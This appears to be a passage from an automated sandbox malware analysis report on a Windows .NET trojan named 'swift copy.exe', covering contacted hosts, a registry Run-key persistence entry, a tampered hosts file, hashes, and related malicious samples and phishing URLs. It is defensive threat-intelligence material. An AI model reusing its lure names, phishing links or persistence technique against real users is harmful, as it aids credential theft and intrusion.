                                http://crl.microsoft.RegSvcs.exe, 00000001.00000002.606061708.0000000005D4C000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://api.ipify.orgGETMozilla/5.0RegSvcs.exe, 00000001.00000002.602050540.0000000002D71000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                23.21.42.25
                                unknownUnited States
                                14618AMAZON-AESUSfalse
                                78.142.210.93
                                unknownTurkey
                                209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue

                                General Information

                                Joe Sandbox Version:31.0.0 Red Diamond
                                Analysis ID:323804
                                Start date:27.11.2020
                                Start time:15:20:21
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 34s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:swift copy.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.adwa.spyw.evad.winEXE@7/6@4/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 1.4% (good quality ratio 0.9%)
                                • Quality average: 37%
                                • Quality standard deviation: 34.3%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.193.48, 205.185.216.10, 205.185.216.42, 8.241.121.126, 8.248.119.254, 8.241.11.254, 8.253.95.249, 8.248.117.254, 104.79.90.110
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:21:22API Interceptor1x Sleep call for process: swift copy.exe modified
                                15:21:36API Interceptor757x Sleep call for process: RegSvcs.exe modified
                                15:21:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                15:21:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                23.21.42.25Inquiry_pdf.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                mazx.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                908.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                0Oen62zpot.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                Catalogue.exeGet hashmaliciousBrowse
                                • api.ipify.org/
                                zMhsjuuCLk.exeGet hashmaliciousBrowse
                                • api.ipify.org/

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                elb097307-934924932.us-east-1.elb.amazonaws.com26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                • 54.225.220.115
                                Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                • 174.129.214.20
                                lxpo.exeGet hashmaliciousBrowse
                                • 54.204.14.42
                                guy1.exeGet hashmaliciousBrowse
                                • 54.225.66.103
                                guy2.exeGet hashmaliciousBrowse
                                • 54.243.161.145
                                PO_0012009.xlsxGet hashmaliciousBrowse
                                • 23.21.252.4
                                5C.exeGet hashmaliciousBrowse
                                • 54.225.169.28
                                INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                • 54.225.66.103
                                #A06578987.xlsmGet hashmaliciousBrowse
                                • 54.204.14.42
                                SecuriteInfo.com.Variant.Bulz.233365.3916.exeGet hashmaliciousBrowse
                                • 23.21.252.4
                                https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                • 54.225.169.28
                                INVOICE.xlsxGet hashmaliciousBrowse
                                • 54.204.14.42
                                PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                • 174.129.214.20
                                Inquiry_pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                98650107.pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                • 174.129.214.20
                                1125_56873981.docGet hashmaliciousBrowse
                                • 54.243.161.145
                                yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                • 54.235.142.93
                                ER mexico.exeGet hashmaliciousBrowse
                                • 54.235.83.248
                                SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exeGet hashmaliciousBrowse
                                • 54.243.164.148

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AMAZON-AESUS26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                • 54.225.220.115
                                Direct Deposit.xlsxGet hashmaliciousBrowse
                                • 34.231.129.212
                                Direct Deposit.xlsxGet hashmaliciousBrowse
                                • 52.205.236.122
                                https://is.gd/NLY8SbGet hashmaliciousBrowse
                                • 35.174.78.146
                                Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                • 174.129.214.20
                                guy1.exeGet hashmaliciousBrowse
                                • 54.225.66.103
                                guy2.exeGet hashmaliciousBrowse
                                • 54.243.161.145
                                https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTczGet hashmaliciousBrowse
                                • 3.215.226.95
                                https://bit.do/fLpprGet hashmaliciousBrowse
                                • 54.83.52.76
                                PO_0012009.xlsxGet hashmaliciousBrowse
                                • 23.21.252.4
                                https://webnavigator.co/?adprovider=AppFocus1&source=d-cp11560482685&group=cg60&device=c&keyword=&creative=477646941053&adposition=none&placement=www.123homeschool4me.com&target=segment_be_a_7802457135858218830&sl=&caid=11560482685&gw=1&test=%3a%2f%2fmailGet hashmaliciousBrowse
                                • 54.90.26.145
                                https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                • 52.202.11.207
                                https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.comGet hashmaliciousBrowse
                                • 34.236.142.3
                                5C.exeGet hashmaliciousBrowse
                                • 54.225.169.28
                                INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                • 54.225.66.103
                                #A06578987.xlsmGet hashmaliciousBrowse
                                • 54.204.14.42
                                https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                • 52.202.11.207
                                http://pma.climabitus.com/undercook.phpGet hashmaliciousBrowse
                                • 23.20.225.204
                                https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                • 52.2.188.208
                                https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.atGet hashmaliciousBrowse
                                • 52.205.236.122
                                VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLiReport Covid-19.docGet hashmaliciousBrowse
                                • 78.142.208.117
                                Report Covid-19.docGet hashmaliciousBrowse
                                • 78.142.208.117
                                Report Covid-19.docGet hashmaliciousBrowse
                                • 78.142.208.117
                                XY8707573112TQ.docGet hashmaliciousBrowse
                                • 78.142.208.117
                                PO# 09222020.docGet hashmaliciousBrowse
                                • 78.142.208.117
                                https://bodyfitline.in/cgi-bin/x8ij-010/Get hashmaliciousBrowse
                                • 78.142.208.117
                                http://siili.net/wp-admin/sites/2877497790058/7fgp-0026856/Get hashmaliciousBrowse
                                • 78.142.208.117
                                http://santushtee.com.np/wp-content/crY/Get hashmaliciousBrowse
                                • 78.142.208.117
                                http://angelina.implantprodental.comGet hashmaliciousBrowse
                                • 45.151.250.169
                                MES_20200730_C59874.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                Rep_786093.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                REP_65048.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                file-20200730-FD441.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                mes_20200730_9939502.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                rep 20200730 Z18109.docGet hashmaliciousBrowse
                                • 78.142.208.114
                                Rep_4917449.docGet hashmaliciousBrowse
                                • 78.142.208.114

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0e26-11-20_Dhl_Signed_document-pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                Arrivalnotice2020pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                SecuriteInfo.com.Mal.Generic-S.26042.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                guy1.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                guy2.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                Exodus.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                INV-6367-20_pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                #A06578987.xlsmGet hashmaliciousBrowse
                                • 23.21.42.25
                                Order 51897.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                PR24869408-V2.PDF.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                98650107.pdf.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                #U00d6deme Onay#U0131 Makbuzu.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                Izezma64.dllGet hashmaliciousBrowse
                                • 23.21.42.25
                                fuxenm32.dllGet hashmaliciousBrowse
                                • 23.21.42.25
                                http://ancien-site-joomla.fr/build2.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                yFD40YF4upaZQYL.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                ER mexico.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                SecuriteInfo.com.BackDoor.SpyBotNET.25.6057.exeGet hashmaliciousBrowse
                                • 23.21.42.25
                                SecuriteInfo.com.ArtemisTrojan.exeGet hashmaliciousBrowse
                                • 23.21.42.25

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQUOTATION REQUEST.exeGet hashmaliciousBrowse
                                  kAUs7lSQgh.exeGet hashmaliciousBrowse
                                    Invoice 802737.exeGet hashmaliciousBrowse
                                      order SS21-031 - A30.exeGet hashmaliciousBrowse
                                        SOA.exeGet hashmaliciousBrowse
                                          updated statement of account showing a balance due.exeGet hashmaliciousBrowse
                                            INV.NO.213242021.exeGet hashmaliciousBrowse
                                              INV.NO.213000242021.exeGet hashmaliciousBrowse
                                                pdf.exeGet hashmaliciousBrowse
                                                  statement of account.exeGet hashmaliciousBrowse
                                                    FINAL DOC.exeGet hashmaliciousBrowse
                                                      0nv9EKtCMv.exeGet hashmaliciousBrowse
                                                        XbJ1zfehhU.exeGet hashmaliciousBrowse
                                                          RC2jmpuEYE.exeGet hashmaliciousBrowse
                                                            QUATATION INQUIRY.exeGet hashmaliciousBrowse
                                                              SOA of AUGUST 2020.exeGet hashmaliciousBrowse
                                                                Quotation Inquiry.exeGet hashmaliciousBrowse
                                                                  770k.exeGet hashmaliciousBrowse
                                                                    c9AwI0x6lR.exeGet hashmaliciousBrowse
                                                                      HoNa6vG013.exeGet hashmaliciousBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                                                        Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):142
                                                                        Entropy (8bit):5.090621108356562
                                                                        Encrypted:false
                                                                        SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                        MD5:8C0458BB9EA02D50565175E38D577E35
                                                                        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\swift copy.exe.log
                                                                        Process:C:\Users\user\Desktop\swift copy.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1314
                                                                        Entropy (8bit):5.350128552078965
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
                                                                        MD5:8198C64CE0786EABD4C792E7E6FC30E5
                                                                        SHA1:71E1676126F4616B18C751A0A775B2D64944A15A
                                                                        SHA-256:C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
                                                                        SHA-512:EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                        C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):45152
                                                                        Entropy (8bit):6.149629800481177
                                                                        Encrypted:false
                                                                        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                        MD5:2867A3817C9245F7CF518524DFD18F28
                                                                        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: QUOTATION REQUEST.exe, Detection: malicious, Browse
                                                                        • Filename: kAUs7lSQgh.exe, Detection: malicious, Browse
                                                                        • Filename: Invoice 802737.exe, Detection: malicious, Browse
                                                                        • Filename: order SS21-031 - A30.exe, Detection: malicious, Browse
                                                                        • Filename: SOA.exe, Detection: malicious, Browse
                                                                        • Filename: updated statement of account showing a balance due.exe, Detection: malicious, Browse
                                                                        • Filename: INV.NO.213242021.exe, Detection: malicious, Browse
                                                                        • Filename: INV.NO.213000242021.exe, Detection: malicious, Browse
                                                                        • Filename: pdf.exe, Detection: malicious, Browse
                                                                        • Filename: statement of account.exe, Detection: malicious, Browse
                                                                        • Filename: FINAL DOC.exe, Detection: malicious, Browse
                                                                        • Filename: 0nv9EKtCMv.exe, Detection: malicious, Browse
                                                                        • Filename: XbJ1zfehhU.exe, Detection: malicious, Browse
                                                                        • Filename: RC2jmpuEYE.exe, Detection: malicious, Browse
                                                                        • Filename: QUATATION INQUIRY.exe, Detection: malicious, Browse
                                                                        • Filename: SOA of AUGUST 2020.exe, Detection: malicious, Browse
                                                                        • Filename: Quotation Inquiry.exe, Detection: malicious, Browse
                                                                        • Filename: 770k.exe, Detection: malicious, Browse
                                                                        • Filename: c9AwI0x6lR.exe, Detection: malicious, Browse
                                                                        • Filename: HoNa6vG013.exe, Detection: malicious, Browse
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                        C:\Windows\System32\drivers\etc\hosts
                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):11
                                                                        Entropy (8bit):2.663532754804255
                                                                        Encrypted:false
                                                                        SSDEEP:3:iLE:iLE
                                                                        MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                        SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                        SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                        SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview: ..127.0.0.1
                                                                        \Device\ConDrv
                                                                        Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1141
                                                                        Entropy (8bit):4.44831826838854
                                                                        Encrypted:false
                                                                        SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                                                        MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                                                        SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                                                        SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                                                        SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                                                        Malicious:false
                                                                        Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.279280036808082
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        File name:swift copy.exe
                                                                        File size:948224
                                                                        MD5:d1173f90f82de7d1730939bd45027f6e
                                                                        SHA1:02dab2d2e93317cf1eee0eba45d8ef6bc3641f74
                                                                        SHA256:43d68057ba4990638dbfe0cf81f0fc6078d431e5574624d1a0ecd7abc413f90f
                                                                        SHA512:ea9ea2cc84d9f176b2195921ac700095c5a8fa55c4b181252fe35a3bde1b1e6aebcd064f6cfd9c464c70f64ba4a8a482b6832de379abf37a9ffedc730fd71adb
                                                                        SSDEEP:24576:GXXQPd4DnRiXiCAXfp1JnmYedj5LvEI3bvQm:GwPenRCiXXfUxiI
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..l..........~.... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4e8b7e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                        Time Stamp:0x5FBF05A0 [Thu Nov 26 01:32:16 2020 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:v4.0.30319
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
